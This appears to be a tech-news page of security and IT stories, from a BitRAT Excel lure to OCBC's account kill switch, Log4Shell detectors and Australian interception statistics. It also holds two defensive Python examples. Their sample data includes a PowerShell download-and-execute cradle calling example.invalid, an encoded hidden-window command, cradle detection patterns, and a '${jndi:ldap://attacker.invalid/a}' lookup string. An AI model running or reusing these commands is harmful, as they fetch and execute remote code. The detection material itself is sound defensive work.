More stories


    Devious hackers are using NFT hype to hijack your PC and webcam

    Cybercriminals are exploiting the growth in popularity of NFTs in efforts designed to trick victims into downloading trojan malware capable of hijacking their PCs while stealing usernames and passwords.

    Cybersecurity researchers at Fortinet have spotted what's described as a "peculiar-looking Excel spreadsheet" which purports to contain information about NFTs, but the real purpose of the file is to aid the delivery of BitRAT malware.

    BitRAT is a remote access trojan (RAT) that first emerged for sale in underground forums in August 2020. What makes it notable is that it can bypass User Account Control (UAC), a Windows feature which helps to prevent unauthorised changes to the operating system.

    The malware comes with various trojan functions, including the ability to steal login credentials from browsers and applications, log keystrokes, and upload and download files. This edition of BitRAT can also monitor the victim's screen in real time, use their webcam and listen to audio through the microphone.

    It isn't detailed how the malicious Excel file is distributed to victims, but it claims to offer forecasts of potential investment returns and the number of NFTs available in each series. It also contains links to legitimate Discord channels on NFTs, meaning it's likely that the intended victims are NFT enthusiasts.

    The Excel file contains a malicious macro which, if enabled, runs a PowerShell script that retrieves and downloads the malware before secretly running it on the compromised machine. Office does not run the macro until the recipient clicks through the security warning to enable it, so that "Enable Content" prompt is the point at which this chain can still be stopped.
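The macro-to-PowerShell chain above is what endpoint telemetry sees as one process launching another. The following is an added example, not Fortinet's or ZDNet's code, of the two detections a defender would write for it: an Office application spawning a script host, and a PowerShell command line carrying download-cradle indicators. The log format (space-separated key=value fields in the style of Sysmon process-creation events), the field names and the four sample events are constructed for the example.

```python
"""Flag an Office macro launching a PowerShell download cradle in process-creation telemetry.

Added example, not Fortinet's or ZDNet's code. The log format and the sample events
are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Parents that should almost never launch a script host on a workstation.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}

# Command-line fragments typical of a PowerShell "download cradle".
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"invoke-expression", r"\biex\b",
    r"-e(nc(odedcommand)?)?\s",          # -e / -enc / -EncodedCommand
    r"-w(indowstyle)?\s+hidden",         # hide the console window
    r"start-bitstransfer", r"bitsadmin",
)]


@dataclass
class Finding:
    pid: int
    reason: str
    command_line: str


def parse_event(line: str) -> Dict[str, str]:
    """Parse `Key=value Key="quoted value"` fields into a dict with lower-cased keys."""
    fields: Dict[str, str] = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line):
        fields[key.lower()] = quoted if quoted else bare
    return fields


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when the event matches either detection, else None."""
    parent = basename(event.get("parentimage", ""))
    child = basename(event.get("image", ""))
    cmdline = event.get("commandline", "")
    reasons: List[str] = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmdline)]
        if hits:
            reasons.append("download cradle indicators: " + ", ".join(hits))
    if not reasons:
        return None
    return Finding(int(event.get("processid", "0")), "; ".join(reasons), cmdline)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run assess() over every non-empty event line and keep the hits."""
    return [f for f in (assess(parse_event(l)) for l in lines if l.strip()) if f]


# Constructed sample telemetry (not real captures). The first event mirrors the chain
# described in the article: Excel launches PowerShell, which fetches and runs a payload.
SAMPLE_EVENTS = [
    r"""Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" CommandLine="powershell.exe -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader.ps1')" ProcessId=4120 UtcTime=2022-02-21T10:15:02Z""",
    r"""Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1" ProcessId=5002 UtcTime=2022-02-21T10:20:11Z""",
    r"""Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" CommandLine="cmd.exe /c whoami" ProcessId=6100 UtcTime=2022-02-21T10:31:45Z""",
    r"""Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA" ProcessId=7310 UtcTime=2022-02-21T10:40:03Z""",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"pid {finding.pid}: {finding.reason}")
```

The second sample (an administrator running a script from Explorer) produces no finding, which is the point of keeping the two rules separate: the parent/child rule catches the macro even when the command line is obfuscated, and the cradle rule catches encoded or hidden-window PowerShell regardless of what launched it.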

    NFTs (non-fungible tokens) are digital tokens that use a blockchain to record ownership of a token linked to a piece of digital content. The hype surrounding NFT art and other collectables means that they can change hands for millions of dollars.

    When there's hype and money involved, people quickly become interested. But cybercriminals are always looking for new trends and themes to exploit to trick victims into opening phishing emails or downloading malware, and now they're leveraging the interest in NFTs.

    In addition to collecting data and snooping on the victim, BitRAT can also install cryptojacking malware on the infected machine, letting the attackers secretly use its processing power to mine Monero.

    As NFTs can change hands for large amounts of money, it's likely that the cybercriminals behind this campaign are financially motivated. But even if the victim doesn't own NFTs, the amount of personal information that can be stolen with trojan malware can be extremely valuable to the attackers, and damaging for the victim.

    "Be mindful that attackers often use attractive and trendy subjects as lures. As NFTs become increasingly popular, they will be used to entice victims into opening malicious files or clicking on malicious links," Fortinet researchers warned. "Standard security practices such as not opening files downloaded from untrusted or suspicious sources can prevent threat actors from gaining access to users' money and valuable data," they added.


    Singapore bank gives customers 'kill switch' to freeze accounts in case of fraud

    Hit by a recent spate of SMS phishing scams, OCBC Bank has introduced a "kill switch" that it says will let its customers cut access to all their accounts if they suspect their personal data have been compromised. When activated, the kill switch will immediately freeze all accounts including digital banking, e-payment, ATM access, and credit cards. Customers will need to call the Singapore bank's hotline and use option "8" to trigger the kill switch, OCBC said in a statement Wednesday. They also will be able to do so via the bank's network of 500 ATMs next month. "Once the kill switch is activated, no transactions, whether done digitally, via an ATM or at branches, can be made. Even recurring or pre-arranged fund transfers will be disabled," OCBC said.

    A customer service representative then would contact the customer to remove compromised bank account access or replace compromised cards with new ones. Only a bank branch employee or customer service executive would have the authority to deactivate the switch, according to OCBC. This also would be carried out only after the bank staff received verified instructions from the customer to do so. Access to all accounts as well as settings, including GIRO arrangements and scheduled funds transfers, would be reinstated once the kill switch was deactivated. OCBC added that the new feature would be offered alongside the bank’s fraud hotline, introduced last month, to guide customers who needed assistance in scam incidents, such as in making a police report. 

    The safeguards come on the heels of a recent spate of SMS phishing scams, which wiped out SG$13.7 million ($10.17 million) from the accounts of 790 OCBC Bank customers. Scammers had manipulated SMS Sender ID details to push out messages that appeared to be from OCBC, urging the victims to resolve issues with their bank accounts. They were then redirected to phishing websites and instructed to key in their bank login details, including username, PIN, and One-Time Password (OTP). An OTP typed into a phishing page is as usable to the attacker as the password it accompanies, which is why SMS-delivered OTPs offer little protection against this kind of real-time phishing.

    Describing the incident as the country's most serious phishing scam involving spoofed SMSes impersonating banks, Singapore's Minister for Finance Lawrence Wong said Tuesday that various steps would be taken to better mitigate the risks of such scams. These would span the entire ecosystem, including banks, telecommunications, law enforcement, and consumer education.

    Banks, for example, would be working to further bolster their fraud monitoring capabilities to better identify suspicious and anomalous transactions, including credit card transactions. They would develop more versatile algorithms employing AI and machine learning to detect suspicious transactions, Wong said. "Such algorithms should be based on multiple sources of information, including customer profile and vulnerabilities, past transaction patterns, account activity, and mobile device identification."

    In addition, SMS service providers and telcos would be required to check against the national Sender ID registry and only pass on messages when the sender details match the registry records. All organisations also must have a valid UEN (unique entity number) if they want to send SMS messages through registered IDs to phone subscribers in Singapore. All major retail banks in Singapore are required to register their Sender ID details with the registry, as are government agencies.

    Wong on Tuesday had alluded to the possibility of a kill switch for customers to freeze their own accounts without needing to contact the banks.


    Google's Chrome OS Flex supporting Macs that Apple has long forgotten

    Apple has supported Macs for many years, but inevitably the day will come when the support plug is pulled, and security patches dry up.


    And once that happens, it's the beginning of the end. And then it's time for the scrap heap.

    Well, if you're someone who didn't send their old Mac off to the scrap heap (or, as it would be today, the recycling center), then you might be able to give the system a new lease of life thanks to Google. Yes, you read that right. Google.

    Chrome OS Flex is Google's latest project, and it brings Chrome OS to Macs and PCs. Aimed at businesses and schools, it is currently in the early access stage and has been designed to be installed in minutes and will look and feel the same as Chrome OS. Google has published a certified models list of systems that will run Chrome OS Flex, and on that list are a number of Macs that are either verified to work or will work but with minor issues.

    Here's the listing of Macs supported by Google Chrome OS Flex, which spans 2009 to 2015:

    • iMac 21.5-inch Mid 2010
    • iMac 21.5-inch Mid 2011/Late 2011
    • iMac 20-inch Early 2009/Mid 2009
    • Mac Mini Late 2014
    • MacBook 13-inch Early 2009/Mid 2009
    • MacBook 13-inch Late 2009
    • MacBook 13-inch Mid 2010
    • MacBook Air 11-inch Mid 2012
    • MacBook Air 11-inch Mid 2013/Early 2014
    • MacBook Pro 13-inch Mid 2009
    • MacBook Pro 13-inch Mid 2012

    As you can see, there are a lot of Macs here going back over a decade. Macs that Apple has long forgotten. What the machine gets back is a currently supported operating system that still receives security updates; protections that depend on Chromebook hardware, such as the Google security chip, are not part of the deal.

    Oh, and Chrome OS Flex also runs on a variety of PCs from vendors including Acer, ASUS, Dell, HP, Microsoft, Toshiba and many more. It's an interesting project and a good way to offer a new lease of life to older Macs. That said, I wonder just how many Macs are still around from the 2009 to 2015 era.


    Ukraine crisis: Russian cyberattacks could affect organisations around the world, so take action now

    The ongoing situation in Ukraine means organisations around the world should be prepared to defend their networks against cyberattacks originating from Russia – although the potential impact of aggressive cyber activity shouldn’t be overestimated. “Concerns are reasonable and valid; Russia has a well-established history of aggressively using their considerable cyber capabilities in Ukraine and abroad,” said Sandra Joyce, executive vice president of global intelligence at cybersecurity company Mandiant, which regularly tracks hostile Russian cyber activity.

    Russia is suspected of being behind offensive cyber campaigns against other countries, including cyberattacks against Georgia, as well as attacks that took down parts of the Ukrainian power grid in December 2015.

    International consensus has also accused the Russian military of being behind the widespread and disruptive NotPetya malware attack of June 2017. NotPetya was designed to target organisations in the Ukrainian financial, energy and government sectors, but, powered by EternalBlue, a leaked NSA exploit for a Windows SMBv1 vulnerability, the self-replicating malware quickly spread to organisations around the world. It wiped networks and caused what was estimated as billions of dollars in damages as victims across Europe, Asia and the Americas were impacted by a cyberattack that wasn't directly aimed at them. Mandiant warned that this type of incident could potentially happen again.

    "We are concerned that, as the situation escalates, serious cyber events will not merely affect Ukraine," said Joyce. "But while we are warning our customers to prepare themselves and their operations, we are confident that we can weather these cyberattacks. We should prepare, but not panic because our perceptions are also the target," she added.

    Many organisations that fell victim to NotPetya had not applied the critical security updates, released months earlier as MS17-010, that closed the SMB flaw EternalBlue exploits. Patching alone was not a complete defence, since the malware also moved laterally with stolen credentials and legitimate administration tools such as PsExec and WMI, but unpatched SMB gave it a route that needed no credentials at all.

    Meanwhile, cyber criminals and nation state-backed hackers continue to take advantage of security issues like the vulnerabilities in Microsoft Exchange, which received critical security updates last year but, in many cases, still haven't been applied by businesses or consumers. Applying security patches in a timely manner can go a long way to protecting networks and infrastructure against intrusions.

    "We are imploring our customers and community to prepare for disruptive and destructive attacks, similar to those that have recently transpired in Ukraine," said Joyce. "Many of the same steps defenders might take to harden their networks against ransomware crime will serve to prepare them from a determined state actor – if they take them now".

    Mandiant also warned that part of the strategy behind offensive cyber activity is designed to create worry and uncertainty. By ensuring that networks are as well-defended against attacks as possible, the damage done by attacks can be minimised, avoiding the panic that adversaries hope to generate.

    "Cyberattacks can be costly for individual organisations and may even seem frightening to some, but their real target is our perceptions. The purpose of these cyberattacks is not simply to wipe hard drives or turn out the lights, but to frighten those who cannot help but notice," said Joyce. "The audience of these attacks is broad, but it is also empowered to determine how effective they are. While these incidents can be quite serious for many, we must remain mindful of their limitations. We only do the adversary a service by overestimating their reach."

    Mandiant's warning follows a similar warning from the UK's National Cyber Security Centre in January, which urged organisations to take action to bolster their cyber resilience as a result of the ongoing tensions around Russia and Ukraine.

    In recent weeks, Ukraine has faced DDoS attacks affecting government services as well as banks, while government websites have been defaced. Nobody has yet explicitly claimed responsibility for the attacks.


    How the initial access broker market leads to ransomware attacks

    To perform a ransomware attack successfully, cybercriminals must first obtain access to their victim’s PC or network. Gone are the days when ransomware was confined to malware that targeted individuals with fake threats from organizations like the FBI or IRS, demanding payment through a PC pop-up following encryption. 

    Now, while individuals may still encounter ransomware, especially when antivirus programs are not in use, companies are the big game that criminals hunt. Time is money in the corporate world, and ransomware has exploded in recent years to become an almost separate cybercriminal business of its own. As a result, 'sub' services have emerged that assist ransomware developers in the deployment of their illicit creations, ranging from language services to handle ransom payment negotiation to Initial Access Brokers (IABs), who offer the covert access to a network required in the first stage of a ransomware attack.

    As noted in new research conducted by KELA, the ransomware-as-a-service (RaaS) economy relies on IABs to reduce the need for extended reconnaissance or the time to find a method of entry. On average, IABs sell initial access for $4,600, and sales take between one and three days to finalize. In the cases identified by the cybersecurity firm, once access has been purchased, it takes up to a month for a ransomware attack to take place, and potentially for the victim to be subsequently named and shamed on a leak site.
    At least five known Russian-speaking ransomware operators use IABs: LockBit, Avaddon, DarkSide, Conti, and BlackByte.

    KELA examined past security incidents involving these ransomware groups. First up is LockBit, whose attack on Bangkok Airways KELA links to AnyConnect VPN access offered for sale by a threat actor called "babam". While it isn't clear exactly who purchased the Bangkok Airways access, on August 23, 2021, not yet a month after the access was offered in underground forums, the airline was infected by ransomware. Two days later, Bangkok Airways appeared on the LockBit leak site. "Bangkok Airways did not disclose any investigation details, but based on the timeline, it is highly possible that the attack was performed using the bought access," the researchers noted.
    In an attack conducted by Avaddon, access to a UAE steel product supplier was found to be up for sale on a forum in a post dated March 8, 2021. Three weeks later, the company appeared on the Avaddon leak site. (This group has reportedly closed down and a tool has been made available to generate decryption keys.)

    DarkSide is infamous for an attack on Colonial Pipeline that caused fuel panic-buying in the United States. In a separate incident, on January 16, 2021, the same "babam" IAB offered access to mining technology firm Gyrodata for sale. Two days later, the access was declared sold, and between January 16 and February 22 an unauthorized actor was lurking on the firm's network. On February 20, DarkSide published the company's name as a victim.

    In another case, access to a US manufacturer was sold on October 8, 2021, for $800. Within two weeks, Conti exposed the firm on its leak site and some stolen data was also published online.

    Ransomware attacks against high-profile targets won't be going away anytime soon. Just before the Super Bowl kicked off, the San Francisco 49ers became the latest victim of BlackByte, which also named the organization on a leak website.


    AWS's AI code reviewer now spots Log4Shell-like bugs in Java and Python code

    Amazon Web Services (AWS) has updated the 'detectors' in its CodeGuru Reviewer tool to seek out log injection flaws, where untrusted input reaches a logger unsanitised, the pattern that made the recently disclosed Log4Shell bug in the popular Java logging library Log4j exploitable.

    The critical Log4j bugs, collectively dubbed Log4Shell after their disclosure in December, jolted the tech industry and end-user organizations into mass remediation efforts that may have averted major attacks so far, though unpatched instances are expected to lurk in systems for years.

    At the time, AWS released several tools to help customers protect resources, such as new web application firewall rules, and updates to its Inspector tool to detect the vulnerability in EC2 VM instances.

    AWS has now announced two new features for CodeGuru Reviewer, its scanner that uses machine learning to check code during reviews for bugs and to suggest fixes for security issues. The tool aims to improve code reviews within continuous integration and delivery (CI/CD) processes: after developers commit code to, say, GitHub or Bitbucket, they can add CodeGuru Reviewer as a code reviewer.

    The new features flesh out the service's security checks. Last year, it added the CodeGuru Reviewer Secrets Detector, which detects risky hardcoded secrets, such as passwords and API access keys, in source code and configuration files for Java and Python applications.

    The brand-new features for CodeGuru Reviewer are a Detector Library covering several common security flaws affecting Java and Python web applications, as well as several new security detectors specifically aimed at Log4Shell-like log injection flaws.

    The Detector Library lists detectors for various flaws common to Java and Python programming, such as unauthenticated LDAP requests in Java code. It offers details about each security issue, its severity and impact on an application, and one example each of non-compliant and compliant code per issue. The library currently contains 91 Java detectors and 69 Python detectors. AWS notes that CodeGuru "uses machine learning and automated reasoning" to identify possible issues, so each detector can find a range of defects beyond the example on its description page.

    In response to Log4Shell, AWS introduced a more general detector for similar flaws that checks whether developers are logging data that "is not sanitized and possibly executable". If it finds such code, it warns that "user-provided inputs must be sanitized before they are logged. An attacker can use unsanitized input to break a log's integrity, forge log entries, or bypass log monitors." It then provides examples of non-compliant and compliant code.

    "These detectors work with Java and Python code and, for Java, are not limited to the Log4j library," AWS notes. "They don't work by looking at the version of the libraries you use, but check what you are actually logging. In this way, they can protect you if similar bugs happen in the future." The check complements upgrading to a fixed Log4j release rather than replacing it: a vulnerable library still evaluates lookup syntax in any string that reaches it, and sanitising for log injection does not generally strip that syntax.

    The service comes at a cost, but might help alleviate issues for organizations facing developer or security skills shortages. The new features are available where CodeGuru Reviewer is available, which includes select US, Europe and Asia Pacific AWS regions. Pricing for CodeGuru Reviewer starts at $10 a month for the first 100,000 lines of code in onboarded repositories, and charges $30 a month for each additional 100,000 lines of code.
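What the detector described above is looking for, as an added example that is not AWS's or CodeGuru's code (and written in Python rather than Java): a login-audit line built from an unsanitised username lets the attacker terminate the record and forge a second, successful-looking one; the hardened formatter escapes control characters before the value is interpolated. The log line format and the forged username are constructed for the example. The `${...}` check at the end is a separate, assumed heuristic for Log4j-style lookup strings; the article's detector does not claim to implement it.

```python
"""Log injection: unsanitised input forging log records, beside a sanitising formatter.

Added example, not AWS or CodeGuru code. The log line format and the forged username
are constructed for illustration.
"""
import re

# Constructed attacker-supplied username: a CRLF followed by a fake, successful admin login.
FORGED_USERNAME = "mallory\r\n2022-02-22T09:00:00Z INFO login user=admin result=success"

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")   # ASCII control characters
_LOOKUP = re.compile(r"\$\{[^}]*\}")         # Log4j-style ${...} lookup syntax (assumed heuristic)


def naive_login_line(ts: str, user: str, ok: bool) -> str:
    """Non-compliant: the raw value goes straight into the record."""
    return f"{ts} INFO login user={user} result={'success' if ok else 'failure'}"


def sanitize_for_log(value: str, max_len: int = 256) -> str:
    """Escape anything that could end the record or hide from a line-oriented parser."""
    value = value.replace("\r", "\\r").replace("\n", "\\n")
    value = _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)
    # U+2028/U+2029 are treated as line breaks by some viewers and JSON consumers.
    value = value.replace("\u2028", "\\u2028").replace("\u2029", "\\u2029")
    if len(value) > max_len:                 # bound what one field can contribute
        value = value[:max_len] + "...[truncated]"
    return value


def safe_login_line(ts: str, user: str, ok: bool) -> str:
    """Compliant: the same record, with the untrusted field sanitised first."""
    return naive_login_line(ts, sanitize_for_log(user), ok)


def contains_lookup(value: str) -> bool:
    """Flag values carrying ${...} lookup syntax such as ${jndi:ldap://...}.
    An alerting aid only; it does not replace upgrading the logging library."""
    return bool(_LOOKUP.search(value))


def records(log_text: str) -> list:
    """How a line-oriented log consumer splits the text into records."""
    return log_text.splitlines()


if __name__ == "__main__":
    ts = "2022-02-22T09:00:01Z"
    print("naive :", records(naive_login_line(ts, FORGED_USERNAME, False)))
    print("safe  :", records(safe_login_line(ts, FORGED_USERNAME, False)))
    print("lookup:", contains_lookup("${jndi:ldap://attacker.invalid/a}"))
```

With the naive formatter, a consumer that splits on newlines sees two records, and the forged second one reads as a successful login for `admin`; with the sanitised formatter the whole username stays inside one record as visible `\r\n` text. The length cap matters for the "bypass log monitors" case: an attacker who can make one field arbitrarily long can push the fields a monitor keys on out of its read window.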


    Australian encryption laws used to force provider to help in homicide case

    When it comes to Australia's encryption laws, two out of the three arms can now be publicly said to have been used, following the release of the Telecommunications (Interception and Access) Act 1979 — Annual Report 2020-21 this week. In previous years, agencies had only used voluntary Technical Assistance Requests (TARs) to get service providers to help them, but the latest report shows NSW Police in the past year also turned to the first of the compulsory notices available. That request, used in a homicide investigation, is the first use of a compulsory Technical Assistance Notice (TAN) to force a provider to use a capability it already possesses. Assistance notices issued by state-level law enforcement are reviewed by the Commissioner of the Australian Federal Police (AFP).

    This leaves the compulsory Technical Capability Notice (TCN) as the only form of notice yet to be publicly disclosed as used. The TCN forces providers to build a new capability for agencies and requires sign-off from the federal Attorney-General and Minister for Communications. The report said no TCNs were sought across the reporting period.

    Of the 25 TARs issued by agencies, NSW Police accounted for 16, Victoria Police for five, with the AFP and Australian Criminal Intelligence Commission both issuing a pair. The categories of offences under which the TARs were issued were eight for organised offences, seven for homicide, seven for drug offences, and one each for sexual assault, cybercrime, and acts intended to cause injury.

    Australia's encryption laws were passed in December 2018, with then-Labor leader Bill Shorten saying he wanted to make Australians safe over Christmas. A year later, after losing an election, Labor wanted to fix the laws it had voted for.

    Since its passing, the most public display of these powers has been Operation Ironside, which the AFP labelled its "most significant operation in policing history". A recent review of the TOLA Act gave a tick to the laws, but it did so while asking for additional safeguards to be added.

    For the now AU$238 million metadata retention scheme, over 314,000 requests for telco data were made. Almost 270,000 pieces of retained data were less than three months old, while over 5,700 were beyond the two-year retention window. Victoria Police made the most requests, with over 110,000, followed by NSW Police on 106,000, and WA Police making just over 26,200 requests for the period. Over 312,000 of the requests related to criminal offences, and almost 3,500 related to missing persons. Following the trend of years past, drug offences continued to be the offence with the most requests, this year with 68,500, followed by fraud, homicide, unlawful entry, abduction, and sexual assault, all sitting in a band between 20,000 and 29,000 requests each. No agencies were authorised to become an enforcement agency in the 2020-21 reporting period, the report said.

    Interception warrants also continued the trend of past years, with Administrative Appeals Tribunal (AAT) members continuing to issue the vast bulk of said warrants, accounting for 2,900 of the 3,500 warrants issued. Of the AAT member number, just shy of 1,700 warrants were applied for by NSW Police, with the force getting only 72 from Federal Court judges. Similarly, the AFP had 590 warrants approved by AAT members from its 653 total. Overall, 3,481 interception warrants were issued to all agencies, and information gained was used in 3,327 arrests, 6,424 prosecutions, and 2,610 convictions.


    Social media platforms have 'assured' 24/7 misinformation monitoring for Australia's upcoming federal election

    The circulation of election conspiracy theories in Australia has increased with the country set to have its federal election later this year, Australia's electoral commissioner said on Tuesday night. Appearing before Senate estimates, AEC commissioner Tom Rogers said the uptick in election conspiracy theories mirrored what has been occurring in overseas jurisdictions. Among the conspiracies posted online has been that postal voting is not secure, Rogers said. The AEC commissioner also warned of other election conspiracies, specifically debunking misinformation that unvaccinated people will not be allowed to vote in person. "One [conspiracy that] doesn't seem to go away is that somehow we're mandating that voters be vaccinated, and that this will deny people the vote," he said, confirming that people will be allowed to vote in person regardless of their vaccination status.

    To address the rise in conspiracy theories, Rogers said his agency has been working more closely with social media platforms to quickly remove election misinformation and disinformation. For one instance of the postal voting conspiracy content arising online, the commissioner said his agency pointed out to Twitter that the content breached the platform's terms of service, which culminated in that information being removed within three hours. "Twitter and others get rightly criticised, but it's a shout out to them for being very responsive to remove something that's dangerous," Rogers said.

    He noted, however, that addressing election misinformation is a complex issue, as the nature of some conspiracies means their removal can fuel the creation of further conspiracies. "[This] can become very circular, so you need to exercise some judgment about how we deal with those issues," he said. Rogers added that while the AEC was able to reach out to Twitter, negotiations are still ongoing with Digital Industry Group Inc (DiGi), the industry group advocating for big tech, to create a formal protocol for working with social media platforms to remove election disinformation and misinformation.

    In the meantime, all major social media platforms have given "assurances" that they would allocate more resources for monitoring election disinformation and misinformation for the upcoming Australian federal election, said deputy electoral commissioner Jeff Pope, who appeared alongside Rogers at Senate estimates. "For this election, we're getting assurances from all of them that they will be expanding their hours of service, including having not just expanded hours of service here in Australia but then actually having staff in other parts of the world so that they can try and get as close to 24/7 coverage — so they're not confined by the business hours of the staff here in Australia," Pope explained. "For instance, some of them have staff here in Australia, they have a regional office in Singapore, then they have another office in Europe. They will be effectively following the sun as we go through the election to try and get as much maximum coverage as possible."

    For the upcoming federal election, where voting is mandatory, the commission expects to go through 4.5 million pencils, up from 100,000 in 2019, along with 34,000 bottles of surface cleaner and 63,000 litres of hand sanitiser as part of its pandemic safety measures.